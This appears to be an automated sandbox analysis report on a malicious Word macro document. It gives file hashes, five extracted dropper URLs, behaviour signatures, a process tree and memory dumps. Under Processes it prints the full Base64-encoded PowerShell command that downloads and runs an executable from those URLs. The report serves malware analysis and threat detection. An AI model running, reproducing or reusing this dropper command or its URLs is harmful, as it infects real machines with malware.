Overview

overview

10

Static

static

1

90518e89ef...18.doc

windows7-x64

10

90518e89ef...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    03-06-2024 02:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    90518e89ef705981a2f552a6020d7e1f_JaffaCakes118.doc

  • Size

    314KB

  • MD5

    90518e89ef705981a2f552a6020d7e1f

  • SHA1

    25916db288c8514022b1f9d93eca4d9615865617

  • SHA256

    ea43e44fe8202b2c586361221366d6d73c7a3f9e00b3471202c81fc8b104dd94

  • SHA512

    7a0ff12f2c7bd4eac41be886c6b4996678a4cf5093b9acb129b2fe5555a36497357e46f314c369953a2ce5d7280d0be925876a3e208401cec603bb664085abc2

  • SSDEEP

    6144:XyqIe6hh859+cs2idc7EeCChevXlwc9Kf:BAhO59jw6FePlkf

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://summertreesnews.com/0GkOWnOx16FEka
exe.dropper

http://ziyimusic.com/UodjTJ0riBe3w_gBUxJCO
exe.dropper

http://shalomsilverspring.com/DjYnScdrVeCU
exe.dropper

http://grupomedica.equipment/Ftfh7wZ3JuiVUFr
exe.dropper

http://hapoo.pet/9vYXJezSnwW3Q

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\90518e89ef705981a2f552a6020d7e1f_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2108
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1848
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABwAF8AXwA0ADIAMwBfAF8APQAoACcAaAAnACsAJwA0ADMANwA4ACcAKwAnADgAXwAnACkAOwAkAHQAOQBfAF8ANABfADQAMgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABHAF8ANgAzADEAMwAyAD0AKAAnAGgAdAB0ACcAKwAnAHAAOgAvAC8AJwArACcAcwB1ACcAKwAnAG0AbQBlAHIAJwArACcAdAByAGUAZQBzAG4AZQB3AHMALgBjAG8AbQAnACsAJwAvADAARwBrAE8AVwAnACsAJwBuAE8AeAAxADYARgBFAGsAYQBAACcAKwAnAGgAdAAnACsAJwB0ACcAKwAnAHAAOgAvAC8AegBpAHkAJwArACcAaQBtACcAKwAnAHUAcwBpACcAKwAnAGMALgAnACsAJwBjAG8AbQAvAFUAbwBkACcAKwAnAGoAVABKADAAJwArACcAcgBpAEIAZQAzACcAKwAnAHcAXwBnACcAKwAnAEIAJwArACcAVQB4ACcAKwAnAEoAQwAnACsAJwBPAEAAaAB0AHQAcAA6AC8AJwArACcALwBzAGgAYQBsAG8AbQBzAGkAbAAnACsAJwB2AGUAcgBzAHAAJwArACcAcgBpAG4AZwAuACcAKwAnAGMAbwBtACcAKwAnAC8AJwArACcARABqAFkAJwArACcAbgBTAGMAZAByAFYAZQBDAFUAQABoAHQAJwArACcAdABwADoALwAvACcAKwAnAGcAJwArACcAcgB1AHAAbwBtAGUAZABpAGMAYQAuAGUAJwArACcAcQB1AGkAcABtAGUAbgB0AC8ARgB0AGYAaAA3AHcAWgAzAEoAdQBpAFYAVQBGACcAKwAnAHIAQAAnACsAJwBoACcAKwAnAHQAdABwACcAKwAnADoAJwArACcALwAvACcAKwAnAGgAJwArACcAYQAnACsAJwBwAG8AJwArACcAbwAuAHAAJwArACcAZQB0AC8AOQAnACsAJwB2AFkAWABKACcAKwAnAGUAegBTACcAKwAnAG4AdwAnACsAJwBXADMAUQAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABvAF8AMgAwADMAMwAxADYAPQAoACcAawAnACsAJwA5ADYAJwArACcAOABfAF8AXwAwACcAKQA7ACQASgAwADMAXwA0ADcAOQBfACAAPQAgACgAJwA0ACcAKwAnADYANwAnACkAOwAkAHAANgA3AF8ANABfADcAXwA9ACgAJwBpADYAJwArACcANAAwACcAKwAnAF8AXwAyADkAJwApADsAJABhADAAXwAzADkANQBfAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABKADAAMwBfADQANwA5AF8AKwAoACcALgBlAHgAJwArACcAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABpAF8AXwAyADQANQAxADkAIABpAG4AIAAkAEcAXwA2ADMAMQAzADIAKQB7AHQAcgB5AHsAJAB0ADkAXwBfADQAXwA0ADIALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAaQBfAF8AMgA0ADUAMQA5ACwAIAAkAGEAMABfADMAOQA1AF8AKQA7ACQAbgA5ADQAXwBfADQAPQAoACcAVwBfAF8AJwArACcANQA4ADAAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAYQAwAF8AMwA5ADUAXwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAGEAMABfADMAOQA1AF8AOwAkAGYAXwBfADMAOAAwADEAPQAoACcATgAyAF8AJwArACcAMgA0ADkAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGoAMwAzADIAMABfADEAPQAoACcAUAA3AF8AJwArACcANgBfADkAJwApADsA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1932

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      d07b075e80c815aecbef3c7aa70d18a9

      SHA1

      0262a992ece1dd59dc499c9d98eb9aa60f011640

      SHA256

      042528042250fea3f2417272c746f7bb2a2a7e4f855c2f598fed4340c7b5fdae

      SHA512

      840ffa0e9a8a9dbaa7ae1f946d565f86ecac212c7187cd8626d34d94b0074926fb0f1b4dd3ff01147a860308eb6708d484fd243d7953310fcab3b825c979e2fb

      Download Submit

    • memory/1932-112-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1932-111-0x000000001B780000-0x000000001BA62000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2108-44-0x0000000005060000-0x0000000005160000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2108-64-0x0000000005060000-0x0000000005160000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2108-105-0x0000000005060000-0x0000000005160000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2108-104-0x0000000005060000-0x0000000005160000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2108-103-0x0000000005060000-0x0000000005160000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2108-28-0x0000000005060000-0x0000000005160000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2108-20-0x0000000005060000-0x0000000005160000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2108-0-0x000000002F871000-0x000000002F872000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2108-48-0x0000000005060000-0x0000000005160000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2108-2-0x0000000070A8D000-0x0000000070A98000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2108-118-0x0000000070A8D000-0x0000000070A98000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2108-119-0x0000000005060000-0x0000000005160000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2108-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2108-140-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2108-141-0x0000000070A8D000-0x0000000070A98000-memory.dmp

      Filesize

      44KB

      Download